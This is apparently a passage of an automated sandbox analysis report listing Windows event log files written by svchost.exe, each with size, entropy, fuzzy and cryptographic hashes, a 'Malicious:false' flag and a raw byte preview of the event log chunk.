                                          Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):3.0631557320109892
                                          Encrypted:false
                                          SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                          MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                          SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                          SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                          SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                          Malicious:false
                                          Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):2.4467272005363894
                                          Encrypted:false
                                          SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                          MD5:155681C222D825199B738E8DEC707DC8
                                          SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                          SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                          SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                          Malicious:false
                                          Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):2.156155224835584
                                          Encrypted:false
                                          SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                          MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                          SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                          SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                          SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                          Malicious:false
                                          Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.9197999988543422
                                          Encrypted:false
                                          SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                          MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                          SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                          SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                          SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                          Malicious:false
                                          Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):5.718426658668259
                                          Encrypted:false
                                          SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                          MD5:8630011707C7BFBCECC0A9430637802E
                                          SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                          SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                          SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                          Malicious:false
                                          Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9963080376858662
                                          Encrypted:false
                                          SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                          MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                          SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                          SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                          SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                          Malicious:false
                                          Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.076996627399968
                                          Encrypted:false
                                          SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                          MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                          SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                          SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                          SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                          Malicious:false
                                          Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):83408
                                          Entropy (8bit):3.4529451891346645
                                          Encrypted:false
                                          SSDEEP:384:36ILTi8IfIFIbIw8IbUsIs6IChtI8IAI8IRI8IdIBZIHI0IWIYzIWIDvkI9ILhhE:3swkchZxGp9Swk
                                          MD5:D47A0ECFAB79D50C82A735D877B18E6C
                                          SHA1:B922759558C794A227CC783DA2E211FE669156C1
                                          SHA-256:4316CDA2E6C3EDF01E86A5549C7B16B18B62BD2F3D3669E7A4CD66FCD987E9BA
                                          SHA-512:BE07960E9E9F85C2D499DB36F8767191340DBBA13E1F16676D8FE88F4D15E96EC6D88CF3BD268C65CF96378B9106528A2B2FB4D91187CB7611D85FFCF2781147
                                          Malicious:false
                                          Preview:ElfChnk.T...............T...................P...h.....&................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......z..........................a..............................................................,.......D.....!........... ....@........@..^<.....fX............z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.801423310886069
                                          Encrypted:false
                                          SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                          MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                          SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                          SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                          SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                          Malicious:false
                                          Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):2.996272372482282
                                          Encrypted:false
                                          SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                          MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                          SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                          SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                          SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                          Malicious:false
                                          Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):76416
                                          Entropy (8bit):3.8900450339652832
                                          Encrypted:false
                                          SSDEEP:768:bUxutDBjV8k+u8eUtHpoVWWJ07SZRcZv76NcRUjGHzLKvc90XKcZv76NcRkpyLj/:OutDBjV8k+u8PtHpoVWo
                                          MD5:CAB3444FEB030AD59FEF1789AE41FE46
                                          SHA1:BF0497F84C43EF29B2908E0E0BCAD9D813346310
                                          SHA-256:D40F3BAC2398207DB6DC1B31B86CED409077BBAD1198F75BA67154BF728070CC
                                          SHA-512:CA66065E1326D5C8F760816BA634AD5D310C5022F2494FC2509505EDD94E7500A80F4CBF8F641119FE5609D34F9245FEB07F3A86284C5420E9613F33AEAB4E46
                                          Malicious:false
                                          Preview:ElfChnk.................O.......T...........0.........8d........................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.........d...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.7376819208886465
                                          Encrypted:false
                                          SSDEEP:384:Hh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnR:HkN2cTOsKJtiBWzYaqBNrjzDbRt
                                          MD5:788871A00E6C27C90BB908A72EDDA1E8
                                          SHA1:19157CCCAADBA0994CB2F0519606CE31628ECFEB
                                          SHA-256:A07C6E6CFFFDC79DC13D91E7ABD0AA8903ABF9847207B43912C61F2FBAB44C48
                                          SHA-512:18C90F97384442B0CCD121AD4FF3718F0B63F846856621142223E6B1A945368294AC173A61FAA8F02320E6B3FBC63D25D850F98FA39D9D79517EE5C72E01A40C
                                          Malicious:false
                                          Preview:ElfChnk.....................................0.......!F.d....................................................................P@.O................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.7590316238843728
                                          Encrypted:false
                                          SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                          MD5:B074238315662886E2BD70106D08A747
                                          SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                          SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                          SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                          Malicious:false
                                          Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):3.7510882393470117
                                          Encrypted:false
                                          SSDEEP:1536:cXhsUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:cX2nS
                                          MD5:7E157981F49B4361EB3619CCE1291694
                                          SHA1:CAD8C707B3E3D29E5F02E10B6EAE245FBF4B67E2
                                          SHA-256:F345ECF7939E71EA8FFFCB45BC70825228E33A83089C2700917A421568FA2738
                                          SHA-512:A5E99C51A0CBA84E2F57B046F1434A45E4115B2F47B07FCF1433CCF966EC1C9AAC8ABC8B7D606816FB65FADB105E7E67AB3126A496FFB620C0D03B25DCEFDEF0
                                          Malicious:false
                                          Preview:ElfChnk.........%...............%............E..`G...*a.....................................................................C5.D................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):2.3069197485541766
                                          Encrypted:false
                                          SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                          MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                          SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                          SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                          SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                          Malicious:false
                                          Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):127536
                                          Entropy (8bit):4.001151727119658
                                          Encrypted:false
                                          SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqsh0w+qLpBVi7CPME79nCxkSq1g:c0w+qtBVih0w+qtBVi+g
                                          MD5:B0FBC2B8844E976AB0EBCB791A2FC647
                                          SHA1:CDFDA89EB07BEC719AAC75B9DC2FB31071F7DCE8
                                          SHA-256:20FFEB7CE7F39CCF55B4838D6AA69BE4C0E915DB9A913592A3AA85764284EB71
                                          SHA-512:D845279448ACB8B23D8759F8AADE21AC0F6648E973DB22FA302FF65AC5D0D8428E54EE5F59C4145271FC3059E98392573F3B527333550ED0969BC2B56C452B24
                                          Malicious:false
                                          Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.2909571978750325
                                          Encrypted:false
                                          SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                          MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                          SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                          SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                          SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                          Malicious:false
                                          Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.488768580471203
                                          Encrypted:false
                                          SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                          MD5:E3FB1708C64D250E4D801AFB8688DF35
                                          SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                          SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                          SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                          Malicious:false
                                          Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):70808
                                          Entropy (8bit):4.499513578020981
                                          Encrypted:false
                                          SSDEEP:1536:xAoP9+xsgZi1XcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAWl:xAoP8xsgZi1XcRFkL1TWX0gkB/J7oasW
                                          MD5:BC10D6D62B90B1D14E5E4388835CB495
                                          SHA1:0E58368171408695F4050FF04DA21A9F4CFF1BDB
                                          SHA-256:5573104124A4D0D76C40E381183DE85569C14D0DA44F7384F194BD2B4E4F2F12
                                          SHA-512:0EDB944E749399D3B6B834D9C438AB553D0AE4EC43CD20CED7D33FB78D422A926A2FEEE24C959124B54061C567DC1BA0C3C6ABA4DACDFE614779E751F5EAEE35
                                          Malicious:false
                                          Preview:ElfChnk.>...............>...........................I.>:.....................................................................E.T................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**..x............................&...............................................................8.......P.....!....nqm......... .........&O......'O.....................................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.~.........n30'x...**..(............x...............&...............................................................8.......P.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):66976
                                          Entropy (8bit):4.477181925275402
                                          Encrypted:false
                                          SSDEEP:384:E7Y7ohN7s7o787l7r787a7J7z7+7N17g7d7Y7g7gY7hZ7D7k7F7r7wm7NP7Y7+7I:M97uCg
                                          MD5:FBD04DC07D03AA33DD161EDCD79EEBB2
                                          SHA1:24E531688AB034EF77086879222202CD3BBF0EF5
                                          SHA-256:5C1A628B639346A80CABA7F8321C89F6F22106102ABF5E7184421A5E67477FF4
